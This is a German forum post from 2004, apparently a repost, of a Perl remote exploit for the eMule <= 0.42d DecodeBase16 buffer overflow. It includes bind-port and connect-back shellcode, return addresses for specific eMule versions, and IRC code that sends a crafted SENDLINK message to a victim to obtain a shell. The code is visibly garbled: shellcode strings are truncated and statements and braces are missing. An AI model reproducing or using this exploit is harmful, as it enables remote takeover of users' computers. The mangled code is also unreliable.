Einzelnen Beitrag anzeigen
Alt 19. April 2004, 19:13
Benutzerbild von niki
niki niki ist offline
Senior Member
Master of Spam
Punkte: 5.847, Level: 52 Punkte: 5.847, Level: 52 Punkte: 5.847, Level: 52
Aktivität: 0% Aktivität: 0% Aktivität: 0%
Registriert seit: Sep 2001
Ort: hessen
Beiträge: 2.745
Renommee-Modifikator: 62
niki is on a distinguished road
# eMule <= 0.42d Remote Exploit by kcope
# exploits the DecodeBase16 buffer overflow
# tested on WinXP SP1 / Win2k SP4
# bindport/connectback shellcode
# thanks Kostya Kortchinsky for his posting to bugtraq
# greetings to sander, blackzero, beginna, adize, A-cru and wY :p
# have fun!
# kcope, kingcope gmx net Apr 2004
use Socket;
use Getopt::Std;
# bindport shellcode (port 2004) thanks to metasploit
$sc = "\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x21\x39".
# connect back shellcode by lion, xor 0x21 
$cbsc = 
# find shellcode in memory
$find_sc = "648B3D08000000BA0100000042424264".
$find_sccb = "648B3D08000000BA0100000042424264".
$numtargets = 4;
@targets = 
["eMule 0.42d", "7af65700", 76],
["eMule 0.42c", "514c5f00", 76],
["eMule 0.42b (Hotfix)", "d12e5f00", 76],
["eMule 0.42a", "012f5f00", 76]
# ["eMule 0.30e", "acf65b00", 20]
$exploiting_nick = "eMuleIRC3713"; # change this nickname if needed
sub connecttoserver()
$bool = "yes";
$iaddr = inet_aton($ircserver) || die("Failed to find host: $ircserver");
$paddr = sockaddr_in($ircport, $iaddr);
$proto = getprotobyname('tcp');
socket(SOCK1, PF_INET, SOCK_STREAM, $proto) || die("Failed to open socket:$!");
connect(SOCK1, $paddr) || {$bool = "no"};
sub usage() {
print "usage: emule4x.pl -n <nick> -s <server> <-t type> [-p port] [-c <ip:port>]\r\n".
"use -c switch for reverse shell\r\n". 
"example: perl emule4x.pl -n emuleuser -s irc.somenet.com -t 0\r\n\r\ntarget types:\r\n";
for ($i=0; $i<$numtargets; $i++) {
print "\t[".$i."]...". $targets[$i][0]. "\r\n";
$| = 1;
print "\r\n----------------------------------------------------------------------\r\n";
print "eMule <= 0.42d Remote Exploit by kcope . kingcope[at]gmx.net\r\n\r";
print "Tested on Win2k SP4/WinXP SP1\r\n";
print "----------------------------------------------------------------------\r\nLets have fun!\r\n\r\n";
if (@ARGV < 4) {
$nickname = $options{n};
$ircserver = $options{s};
$type = $options{t};
if (!defined $targets[$type][0]) {
print "Invalid target type.\r\n";
if (!defined $type) {
print "Please specify a target type.\r\n";
if (defined $options{p}) {
$ircport = $options{p};
} else {
$ircport = 6667;
if (defined $options{c}) {
$idx = index $options{c},":";
$cbip = substr $options{c},0,$idx;
$cbport = substr $options{c},$idx+1; 
print "Target type set to ".$targets[$type][0].".\r\n";
$ret = $targets[$type][1];
$nops1 = "90" x $targets[$type][2];
$nops2 = "90" x 40; # customize if needed
if ($usecb eq 1) {
($a1, $a2, $a3, $a4) = split(//, gethostbyname("$cbip"));
$a1 = chr(ord($a1) ^ 0x21);
$a2 = chr(ord($a2) ^ 0x21);
$a3 = chr(ord($a3) ^ 0x21);
$a4 = chr(ord($a4) ^ 0x21);
substr($cbsc, 111, 4, $a1 . $a2 . $a3 . $a4);
($p1, $p2) = split(//, reverse(pack("s", $cbport)));
$p1 = chr(ord($p1) ^ 0x21);
$p2 = chr(ord($p2) ^ 0x21);
substr($cbsc, 118, 2, $p1 . $p2);
print "Using connect back method on $cbip port $cbport.\r\n";
print "Connecting to $ircserver on port $ircport...";
if ($bool eq "no")
print "Connection refused.\r\n";
send(SOCK1,"NICK $exploiting_nick\r\n",0);
send(SOCK1,"USER $exploiting_nick \"yahoo.com\" \"eu.dal.net\" :$exploiting_nick\r\n",0);
while (<SOCK1>) { 
$line = $_;
# print $line;
if ((index $line, " 376 ") ne -1) {
goto logged_in; 
if ((index $line, "PING") ne -1) {
send(SOCK1, $line, 0); 
print " ok\r\n"; 
print "Sending buffers to $nickname...";
# 005f4c51 eMule 0.42c (514c5f00)
# 0057f67a eMule 0.42d (7AF65700)
if ($usecb eq 1) {
send(SOCK1, "PRIVMSG $nickname :$cbsc\r\n", 0);
send(SOCK1, "PRIVMSG $nickname :\x01SENDLINK\|" . $nops1 . "EB079090". $ret .
"906681EC4000". $nops2 . $find_sccb ."\|\x01\r\n", 0);
} else {
send(SOCK1, "PRIVMSG $nickname :$sc\r\n", 0);
send(SOCK1, "PRIVMSG $nickname :\x01SENDLINK\|" . $nops1 . "EB079090". $ret .
"906681EC4000". $nops2 . $find_sc ."\|\x01\r\n", 0); 
if ($usecb ne 1) {
print "\r\nNow try connecting to ".$nickname."'s ip on port 2004.\r\n";
} else {
print "\r\nWatch at your netcat for some shell.\r\n"; 
$recv = <SOCK1>;
$recv = <SOCK1>;
$recv = <SOCK1>;
$recv = <SOCK1>;
$recv = <SOCK1>;
$recv = <SOCK1>;
$recv = <SOCK1>;
$recv = <SOCK1>;
$recv = <SOCK1>;
print " done\r\n";
DAS ist ein gutes Spiel
fuck off p2p